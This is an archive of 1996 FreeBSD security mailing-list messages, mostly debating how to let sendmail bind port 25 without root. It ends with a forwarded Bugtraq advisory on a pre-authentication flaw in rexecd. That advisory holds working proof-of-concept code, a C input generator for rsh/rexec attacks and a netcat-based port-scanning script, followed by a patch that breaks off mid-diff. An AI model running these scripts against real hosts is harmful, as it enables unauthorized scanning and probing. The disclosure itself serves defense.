gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id KAA15940; Mon, 18 Nov 1996 10:45:39 -0800 (PST) From: Don Lewis Message-Id: <199611181845.KAA15940@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 10:45:39 -0800 In-Reply-To: Poul-Henning Kamp "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 8:30am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Poul-Henning Kamp Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@FreeBSD.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 8:30am, Poul-Henning Kamp wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } What we REALLY need, is a way for root, to hand out certain priviledges. } } Imagine this: } } sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` } sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` } sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` } sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` } } This means that users with UID smtp can bind to socket 25 (aka smtp), } and so on. Now sendmail NEVER needs to be root. I was thinking more along the lines of chroot(), but for port numbers. Root could mark a process and it's decendents as having access to port 25, and other processes and their decendents as never having access to port 25, even if they are root. I'd have two independent sets of limits, one for run-of-the-mill processes and one for "privileged" processes. Of course, the average processes wouldn't be able to access anything the "privileged" ones couldn't. Of course, our schemes could be combined and access granted to the intersection of the two sets. --- Truck From owner-freebsd-security Mon Nov 18 11:21:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA06037 for security-outgoing; Mon, 18 Nov 1996 11:21:52 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA06016 for ; Mon, 18 Nov 1996 11:21:47 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id OAA14295; Mon, 18 Nov 1996 14:16:10 -0500 From: Adam Shostack Message-Id: <199611181916.OAA14295@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611181845.KAA15940@salsa.gv.ssi1.com> from Don Lewis at "Nov 18, 96 10:45:39 am" To: Don.Lewis@tsc.tdk.com (Don Lewis) Date: Mon, 18 Nov 1996 14:16:10 -0500 (EST) Cc: phk@critter.tfs.com, freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Don Lewis wrote: | On Nov 18, 8:30am, Poul-Henning Kamp wrote: | } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). | | } What we REALLY need, is a way for root, to hand out certain priviledges. | } | } Imagine this: | } | } sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` | } sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` | } sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` | } sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` | } | } This means that users with UID smtp can bind to socket 25 (aka smtp), | } and so on. Now sendmail NEVER needs to be root. | | I was thinking more along the lines of chroot(), but for port numbers. | Root could mark a process and it's decendents as having access to port 25, | and other processes and their decendents as never having access to port 25, | even if they are root. I'd have two independent sets of limits, one for | run-of-the-mill processes and one for "privileged" processes. Of course, | the average processes wouldn't be able to access anything the "privileged" | ones couldn't. If network access went through the file system, then chown smtp /dev/tcp/smtp would give us a known access control mechanism, rather than trying to extend the process table. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Nov 18 11:35:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA07056 for security-outgoing; Mon, 18 Nov 1996 11:35:57 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA07044 for ; Mon, 18 Nov 1996 11:35:49 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id LAA16011; Mon, 18 Nov 1996 11:35:16 -0800 (PST) From: Don Lewis Message-Id: <199611181935.LAA16011@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 11:35:16 -0800 In-Reply-To: Adam Shostack "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 2:16pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Adam Shostack , Don.Lewis@tsc.tdk.com (Don Lewis) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: phk@critter.tfs.com, freebsd-security@FreeBSD.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 2:16pm, Adam Shostack wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } } If network access went through the file system, then } chown smtp /dev/tcp/smtp would give us a known access control } mechanism, rather than trying to extend the process table. Yeah, something like that, but the usual semantics folks talk about are open("/dev/tcp/remote-address/remote-port", ...). It is really desireable to set permissions on both the local address/port and the remote address/port (user foo is only allowed to connect to port 1234 on serverA using a port in the range 2000-2050). Handling port ranges gets a bit messy, too. Then there's the nastyness of what to do about chrooted processes. You really want to be able to map a subset of the network space into their filesystems space. I think mapping network accesses into filesystem space is the way to go, but I don't know how to get the semantics right. --- Truck From owner-freebsd-security Mon Nov 18 12:42:34 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA10279 for security-outgoing; Mon, 18 Nov 1996 12:42:34 -0800 (PST) Received: from quackerjack.cc.vt.edu (quackerjack.cc.vt.edu [198.82.160.250]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA10268 for ; Mon, 18 Nov 1996 12:42:30 -0800 (PST) Received: from sable.cc.vt.edu (sable.cc.vt.edu [128.173.16.30]) by quackerjack.cc.vt.edu (8.7.1/8.7.1) with SMTP id PAA01572; Mon, 18 Nov 1996 15:42:16 -0500 (EST) Received: from alsatian.cslab.vt.edu (alsatian.cslab.vt.edu [198.82.184.11]) by sable.cc.vt.edu (8.6.12/8.6.12) with SMTP id PAA04565; Mon, 18 Nov 1996 15:42:15 -0500 Received: from husky.cslab.vt.edu by alsatian.cslab.vt.edu (5.65v3.2/1.1.10.5/18Sep96-0417PM) id AA15993; Mon, 18 Nov 1996 15:42:14 -0500 From: Jeff Aitken Received: by husky.cslab.vt.edu (5.65v3.2/1.1.10.5/22Aug96-1216PM) id AA26448; Mon, 18 Nov 1996 15:42:13 -0500 Message-Id: <9611182042.AA26448@husky.cslab.vt.edu> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: Don.Lewis@tsc.tdk.com (Don Lewis) Date: Mon, 18 Nov 1996 15:42:13 -0500 (EST) Cc: freebsd-security@FreeBSD.org In-Reply-To: <199611181935.LAA16011@salsa.gv.ssi1.com> from "Don Lewis" at Nov 18, 96 11:35:16 am X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Don Lewis writes: > On Nov 18, 2:16pm, Adam Shostack wrote: > } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > } > } If network access went through the file system, then > } chown smtp /dev/tcp/smtp would give us a known access control > } mechanism, rather than trying to extend the process table. > > I think mapping network accesses into filesystem space is the way to > go, but I don't know how to get the semantics right. Am I mis-remembering things, or is this exactly the sort of thing the portal filesystem is supposed to provide? I don't have my 4.4BSD book handy, but I seem to recall reading about this kind of feature. -- Jeff Aitken jaitken@dimension.net From owner-freebsd-security Mon Nov 18 13:28:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA12925 for security-outgoing; Mon, 18 Nov 1996 13:28:50 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA12910 for ; Mon, 18 Nov 1996 13:28:40 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id NAA16195; Mon, 18 Nov 1996 13:27:19 -0800 (PST) From: Don Lewis Message-Id: <199611182127.NAA16195@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 13:27:19 -0800 In-Reply-To: Jeff Aitken "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 3:42pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Jeff Aitken , Don.Lewis@tsc.tdk.com (Don Lewis) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@FreeBSD.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 3:42pm, Jeff Aitken wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } Don Lewis writes: } > On Nov 18, 2:16pm, Adam Shostack wrote: } > } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } > } } > } If network access went through the file system, then } > } chown smtp /dev/tcp/smtp would give us a known access control } > } mechanism, rather than trying to extend the process table. } > } > I think mapping network accesses into filesystem space is the way to } > go, but I don't know how to get the semantics right. } } Am I mis-remembering things, or is this exactly the sort of thing the } portal filesystem is supposed to provide? I don't have my 4.4BSD book } handy, but I seem to recall reading about this kind of feature. Sort of, though the classical implementation only allows you to specify the remote address for the network connection. Also, there's no way to do a chown(), so any access rights checking has to be performed by the portal daemon rather than by filesystem permission bits. --- Truck From owner-freebsd-security Mon Nov 18 13:59:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA15503 for security-outgoing; Mon, 18 Nov 1996 13:59:39 -0800 (PST) Received: (from jmb@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA15497; Mon, 18 Nov 1996 13:59:36 -0800 (PST) From: "Jonathan M. Bresler" Message-Id: <199611182159.NAA15497@freefall.freebsd.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: black@gage.com (Ben Black) Date: Mon, 18 Nov 1996 13:59:35 -0800 (PST) Cc: fenner@parc.xerox.com, msmith@atrad.adelaide.edu.au, freebsd-security@freebsd.org In-Reply-To: <9611181749.AA29784@squid.gage.com> from "Ben Black" at Nov 18, 96 11:49:32 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Ben Black wrote: > > >It is, of course, possible to run as root for *just long enough* to bind to > >port 25. Then setuid("smtp"). > > > > even better would be finer grained control over access to low numbered ports > so you wouldn't need to be root to bind port 25. portals. someone needs to finish jan-simon pendry's work ;( then each port has has filesystem protection semantics and this becomes very easy. jmb -- Jonathan M. Bresler FreeBSD Postmaster jmb@FreeBSD.ORG FreeBSD--4.4BSD Unix for PC clones, source included. http://www.freebsd.org/ PGP 2.6.2 Fingerprint: 31 57 41 56 06 C1 40 13 C5 1C E3 E5 DC 62 0E FB From owner-freebsd-security Mon Nov 18 15:39:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA22732 for security-outgoing; Mon, 18 Nov 1996 15:39:48 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA22703 for ; Mon, 18 Nov 1996 15:39:29 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id SAA15752; Mon, 18 Nov 1996 18:35:13 -0500 From: Adam Shostack Message-Id: <199611182335.SAA15752@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9611182042.AA26448@husky.cslab.vt.edu> from Jeff Aitken at "Nov 18, 96 03:42:13 pm" To: jaitken@cslab.vt.edu (Jeff Aitken) Date: Mon, 18 Nov 1996 18:35:12 -0500 (EST) Cc: Don.Lewis@tsc.tdk.com, freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Jeff Aitken wrote: | Don Lewis writes: | > On Nov 18, 2:16pm, Adam Shostack wrote: | > } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). | > } | > } If network access went through the file system, then | > } chown smtp /dev/tcp/smtp would give us a known access control | > } mechanism, rather than trying to extend the process table. | > | > I think mapping network accesses into filesystem space is the way to | > go, but I don't know how to get the semantics right. | | Am I mis-remembering things, or is this exactly the sort of thing the | portal filesystem is supposed to provide? I don't have my 4.4BSD book | handy, but I seem to recall reading about this kind of feature. It does indeed mention this, and suggests a semantic of /net/tcp/McKusick.com/smtp. It refers to a paper by Stevens & Pendry (Portals in 4.4BSD, Jan 95 Usenix proceedings). Page 237 of 4.4bsd. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Nov 18 20:20:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA12775 for security-outgoing; Mon, 18 Nov 1996 20:20:48 -0800 (PST) Received: from cwsys.cwent.com (cschuber.net.gov.bc.ca [142.31.240.113]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA12770 for ; Mon, 18 Nov 1996 20:20:40 -0800 (PST) Received: from cwsys (1000@localhost [127.0.0.1]) by cwsys.cwent.com (8.8.3/8.6.10) with ESMTP id UAA01555; Mon, 18 Nov 1996 20:19:51 -0800 (PST) Message-Id: <199611190419.UAA01555@cwsys.cwent.com> Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: Xmh To: "az.com" cc: freebsd-security@freebsd.org Subject: Re: grand alternatives to chroot, solution to the age-old root problem In-reply-to: Your message of "Sun, 17 Nov 1996 13:56:56 PST." Date: Mon, 18 Nov 1996 20:19:48 -0800 From: Cy Schubert Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > Has anyone considered enabling 'virtual-machines' on UNIX? Why not > dedicate a physical machine to this purpose and firewall it off from the > rest by making each virtual machine to appear to be gateway'd via a > point-point connection to the main subnet. Each user telnets into a unix > logical "machine" with a distinct IP address of their own. The 'mother' > kernel above provides a socket to the IP world disallowing sniffing and > also provides a bandwidth usage auditor and choke. (It looks like a > completely separate box with its own init, etc.) Each user gets complete > control in their own machine with access to their web server, programs, > etc. > > No longer do you have to worry about whether they have root or not - in > fact each user gets to be root! (in their own machine, of course ;) ) If > they want to hack, get fancy, reboot, etc. - its up to them - its *their* > system, not yours. > > If they blow out the virtual OS space because they gave their password out > to a grommet or made a mistake, you simply run a utility which checks and > repairs virtual file system's partitions and refreshes the virtual > 'environment's' OS from a template. What you describe here is VM. IBM has been marketing this for its mainframes for about 25 years. You can IPL (boot) CMS, MVS, VSE, AIX [UNIX], UTS [also UNIX], MTS, or another VM operating system (technically VM is a control program [CP], not an operating system) in a virtual machine. Everything is virtuallized, from memory, to SMP, to disks (called minidisks). Because of this virtualization of hardware there is a price to pay in performance and the amount of hardware required to support the environment. (IBM has implemented PR/SM, VM in microcode, and it is felt that IBM will be replacing VM with PR/SM at some future date). In theory, building such a beast would not require the modification of any operating system you wish to run under the control of the CP, except to improve overall system performance, e.g. tell the CP dispatcher of certain events within the virtual machine to help it decide whether to give cycles to another virtual machine. Since all devices are virtualized, you could limit what each virtual machine would have access to, e.g. a vm may have put its virtual ethernet interface into a promiscuous mode where in fact the CP will not allow any sniffing. Having worked in such an environment in a past life as an MVS systems programmer, this environment is a handy tool to have, however in todays age of cheap hardware you may be better off with a number of FreeBSD boxes connected to an etherswitch. Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Mon Nov 18 21:22:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA16242 for security-outgoing; Mon, 18 Nov 1996 21:22:29 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA16236 for ; Mon, 18 Nov 1996 21:22:24 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id WAA04323; Mon, 18 Nov 1996 22:22:09 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id WAA00676; Mon, 18 Nov 1996 22:21:50 -0700 (MST) Date: Mon, 18 Nov 1996 22:21:49 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Poul-Henning Kamp cc: freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9172.848302243@critter.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk All arguments about just how much of a MTA needs to bet setuid and why it can/can't be that way in real/fake life, do people think what phk suggests would be a useful thing, either as a seperate patch or in the base kernel? It is trivial to implement; took 10 minutes to hack together a limited version (ie. uses names like net.inet.tcp.uidforport_25 because I didn't feel like creating a new level just for my hack and all the ports aren't implemented). The biggest problem I see to implementing such a thing is that I can't see a pretty way to make it fit into the sysctl mold without having 1024 lines, one for each port < 1024. Anyone have any ideas on how to do that nicely or if 1024 lines is ok? On Mon, 18 Nov 1996, Poul-Henning Kamp wrote: > What we REALLY need, is a way for root, to hand out certain priviledges. > > Imagine this: > > sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` > sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` > sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` > sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` > > This means that users with UID smtp can bind to socket 25 (aka smtp), > and so on. Now sendmail NEVER needs to be root. > > How's that for security ? From owner-freebsd-security Mon Nov 18 21:47:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA17405 for security-outgoing; Mon, 18 Nov 1996 21:47:05 -0800 (PST) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA17400; Mon, 18 Nov 1996 21:47:03 -0800 (PST) Received: from escape.cs.ibank.ru (escape.cs.ibank.ru [194.58.131.150]) by who.cdrom.com (8.7.5/8.6.11) with ESMTP id VAA12573 ; Mon, 18 Nov 1996 21:45:59 -0800 (PST) Received: (from igor@localhost) by escape.cs.ibank.ru (8.8.3/8.8.3/Zynaps) id IAA14073; Tue, 19 Nov 1996 08:43:01 +0300 (MSK) From: Igor Vinokurov Message-Id: <199611190543.IAA14073@escape.cs.ibank.ru> Subject: sendmail_wrapper.c To: security@freebsd.org, isp@freebsd.org Date: Tue, 19 Nov 1996 08:43:00 +0300 (MSK) X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk re, Where I can get sendmail wrapper code, which only accept incoming calls and queue messages? -- Igor Vinokurov From owner-freebsd-security Tue Nov 19 00:26:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA22809 for security-outgoing; Tue, 19 Nov 1996 00:26:27 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA22804; Tue, 19 Nov 1996 00:26:23 -0800 (PST) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id RAA00452; Mon, 18 Nov 1996 17:23:50 +0100 (MET) To: Marc Slemko cc: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Mon, 18 Nov 1996 08:22:54 MST." Date: Mon, 18 Nov 1996 17:23:49 +0100 Message-ID: <450.848334229@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message , Marc Sle mko writes: >What does sendmail need to do WRT binding to ports that a webserver >doesn't? Programs such as webservers work quite well with a parent >process running as root that binds to the port and forks childs running as >some non-root uid to handle requests. Why couldn't (this part) of >sendmail's problems be fixed the same way? Sure, but I'd rather once and for all get rid of the root bit :-) -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Tue Nov 19 07:53:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA13600 for security-outgoing; Tue, 19 Nov 1996 07:53:45 -0800 (PST) Received: from cwsys.cwent.com (cschuber.net.gov.bc.ca [142.31.240.113]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA13591; Tue, 19 Nov 1996 07:53:36 -0800 (PST) Received: from cwsys (1000@localhost [127.0.0.1]) by cwsys.cwent.com (8.8.3/8.6.10) with ESMTP id HAA00979; Tue, 19 Nov 1996 07:53:31 -0800 (PST) Message-Id: <199611191553.HAA00979@cwsys.cwent.com> Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: Xmh To: security-officer@freebsd.org cc: freebsd-security@freebsd.org Subject: Futile rexecd holes Date: Tue, 19 Nov 1996 07:53:27 -0800 From: Cy Schubert Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This was sent to me from BUGTRAQ. It may be of interest to many of you. Regards, Phone: (250)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." ------- Forwarded Message Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.3/8.6.10) with SMTP id AAA05071 for cy; Tue, 19 Nov 1996 00:58:45 -0800 (PST) X-UIDL: 848412018.004 Resent-From: Cy Schubert - ITSD Open Systems Group Resent-Message-Id: <199611190858.AAA05071@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.3/8.6.10) with SMTP id AAA05221 for ; Tue, 19 Nov 1996 00:58:43 -0800 (PST) Received: from brimstone.netspace.org by orca.gov.bc.ca (5.4R3.10/200.1.1.4) id AA18528; Tue, 19 Nov 1996 00:58:41 -0800 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <25554-2781>; Tue, 19 Nov 1996 03:52:26 -0500 Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id DAA10692; Tue, 19 Nov 1996 03:44:30 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 1436340 for BUGTRAQ@NETSPACE.ORG; Tue, 19 Nov 1996 03:35:08 -0500 Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id DAA09363 for ; Tue, 19 Nov 1996 03:29:31 -0500 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from dhp.com (dhp.com [199.245.105.1]) by netspace.org (8.8.2/8.8.2) with ESMTP id XAA15996 for ; Mon, 18 Nov 1996 23:23:20 -0500 Received: (from jaeger@localhost) by dhp.com (8.8.2/8.6.12) id XAA01206; Mon, 18 Nov 1996 23:24:42 -0500 Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: jaeger Message-Id: Date: Mon, 18 Nov 1996 23:24:42 -0500 Reply-To: jaeger Sender: Bugtraq List From: jaeger Subject: Futile rexecd holes X-To: deraadt@openbsd.org To: Multiple recipients of list BUGTRAQ Resent-To: cy@uumail.gov.bc.ca Resent-Date: Tue, 19 Nov 96 00:58:45 -0800 Resent-XMts: smtp Vulnerability: Rexecd allows redirection of stderr stream to an arbitrary port on the client machine. This stream is opened by rexecd before authentication of the user. Vulnerable: All systems with BSD-based networking including FreeBSD, OpenBSD, NetBSD, BSDI BSD/OS, Solaris 2, OSF/1, Ultrix, Linux. Background: Rshd and rexecd can output stderr by opening a socket from the server machine to the client machine which is accepted by the rsh or rexec client. The rsh client opens the initial connection from a privileged port, rshd responds from a privileged port, and redirects the connection to a privleged port on the client machine. The trust model is preserved because this whole process is controlled by the setuid program rsh on the client machine. Exec is fundamentally similar to the shell service except that instead of a remote and local username being transmitted (for .rhosts and hosts.equiv authentication only) a username and password is transmitted, and the whole exchange uses unprivileged ports. Discussion: Because rexec uses unprivileged ports for the whole process, any user can send a request to a rexecd requesting connection of the stderr stream to an arbitrary port on the client machine. Since the client is unprivileged, there is no possibility for the legitimate stderr stream to be destined for a privileged port. In addition, spoofing techniques could allow the client to direct the stderr stream towards an arbitrary host as well as an arbitrary port, possibly exploiting a given trust model. Since rexecd terminates if the stderr port can't be connected to, and the port can be specified, rexecd can be used to easily scan the client host from the server host. The included script "rexecscan" demonstrates this. Repeat-By: begin prservice.c /* modified by jaeger 12Nov1996. Duplicated slack coding style. now takes port locuser remuser [cmd] port remuser passwd [cmd] where port is the dst port you wish the stderr socket to connect to from the server to the client machine. /* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up rsh/rexec attacks. Needs to be a prog because shells strip out nulls. args: locuser remuser [cmd] remuser passwd [cmd] cmd defaults to "pwd". ... whatever. _H*/ #include /* change if you like; "id" is a good one for figuring out if you won too */ static char cmd[] = "pwd"; static char buf [256]; main(argc, argv) int argc; char * argv[]; { register int x; register int y = 0; char * p; char * q; p = buf; memset (buf, 0, 256); if (! argv[1]) goto wrong; x = strlen (argv[1]); memcpy (p, argv[1], x); /* port plus null */ x++; p += x; y += x; if (! argv[2]) goto wrong; x = strlen (argv[2]); memcpy (p, argv[2], x); /* second arg plus null */ x++; p += x; y += x; if (! argv[3]) goto wrong; x = strlen (argv[3]); memcpy (p, argv[3], x); /* third arg plus null */ x++; p += x; y += x; q = cmd; if (argv[4]) q = argv[4]; x = strlen (q); /* not checked -- bfd */ memcpy (p, q, x); /* the command, plus final null */ x++; p += x; y += x; memcpy (p, "\n", 1); /* and a newline, so it goes */ y++; write (1, buf, y); /* zot! */ exit (0); wrong: fprintf (stderr, "%s: \n",argv[0]); exit (1); } end prservice.c begin rexecscan #!/bin/sh # Dumb script to demonstrate scanning with rexecd # jaeger, 12Nov1996 # Path to netcat NC=nc # Path to prservice program PRS=./prservice # Port to scan to MAX=1024 TARGET=$1 USER=$2 PASSWORD=$3 PORT=1 if [ $# -ne 3 ]; then echo "$0 " fi while [ $PORT -lt $MAX ]; do $PRS $PORT $USER $PASSWORD "echo $PORT open" | $NC $TARGET 512 PORT=`expr $PORT + 1` done exit 0 end rexecscan Suggested Fix: The rexecd should check the specified return port ("port") to make sure it is nonprivileged, and not open the stderr stream until authentication is complete. Similar fixes for rshd are left as an exercise for the reader. *** rexecd.c.dist Mon Nov 11 11:32:23 1996 - --- rexecd.c Thu Nov 14 01:55:17 1996 *************** *** 151,168 **** port = port * 10 + c - '0'; } (void) alarm(0); ! if (port != 0) { ! s = socket(AF_INET, SOCK_STREAM, 0); ! if (s < 0) ! exit(1); ! if (bind(s, (struct sockaddr *)&asin, sizeof (asin)) < 0) ! exit(1); ! (void) alarm(60); ! fromp->sin_port = htons(port); ! if (connect(s, (struct sockaddr *)fromp, sizeof (*fromp)) < 0) ! exit(1); ! (void) alarm(0); ! } getstr(user, sizeof(user), "username"); getstr(pass, sizeof(pass), "password"); getstr(cmdbuf, sizeof(cmdbuf), "command"); - --- 151,157 ---- port = port * 10 + c - '0'; } (void) alarm(0); ! getstr(user, sizeof(user), "username"); getstr(pass, sizeof(pass), "password"); getstr(cmdbuf, sizeof(cmdbuf), "command"); *************** *** 215,220 **** - --- 204,227 ---- error("No remote directory.\n"); exit(1); } + + if (port != 0) { + if ((port != 0) && (port < IPPORT_RESERVED)) { + syslog(LOG_ERR, "client stderr port in reserved range\n"); + exit(1); + } + s = socket(AF_INET, SOCK_STREAM, 0); + if (s < 0) + exit(1); + if (bind(s, (struct sockaddr *)&asin, sizeof (asin)) < 0) + exit(1); + (void) alarm(60); + fromp->sin_port = htons(port); + if (connect(s, (struct sockaddr *)fromp, sizeof (*fromp)) < 0) + exit(1); + (void) alarm(0); + } + (void) write(2, "\0", 1); if (port) { (void) pipe(pv); *************** *** 255,260 **** - --- 262,268 ---- (void) close(s); (void)close(pv[0]); dup2(pv[1], 2); } + if (*pwd->pw_shell == '\0') 